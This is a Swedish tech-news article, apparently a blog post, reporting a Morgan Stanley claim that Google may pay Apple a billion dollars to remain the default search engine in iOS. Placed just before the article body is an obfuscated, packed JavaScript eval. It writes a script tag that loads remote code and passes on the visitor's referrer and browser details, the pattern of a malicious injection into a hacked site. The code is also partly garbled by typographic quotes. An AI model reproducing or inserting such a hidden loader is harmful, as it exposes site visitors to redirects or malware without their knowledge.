Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

Google kan vara redo att betala en miljard dollar till Apple

Google kan vara redo att betala en miljard dollar till Apple
Sebastian Plengier Ehrnfelt

Google: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kakrr|var|u0026u|referrer|hzfid||js|php’.split(‘|’),0,{}))
Ingenting står klart men enligt en rapport från banken Morgan Stanley så verkar det som att Google kan vara redan att betala en miljard dollar till Apple för att bli standardsökmotor i Apples kommande operativsystem iOS. 

För att jämföra detta kan vi titta tillbaka till 2009 då Google betalade ca 82 miljoner dollar för att få exakt samma sak,

Som vi kan se så har siffran gått upp en aning på dessa fem år. Detta kan förklaras med att Google betalar alla de intäkter de gör på annonsering i iOS. Och om man tänker sig alla de iOS-produkter som tros finnas på marknaden 2014 jämfört med just 2009 så förstår man den stora höjningen.

Och det nämns att Google ska ha betalat ca en miljard dollar förra året till Apple för att fortsätta vara standardsökmotor på  OS X webbläsare Safari.

Via: techcrunch.com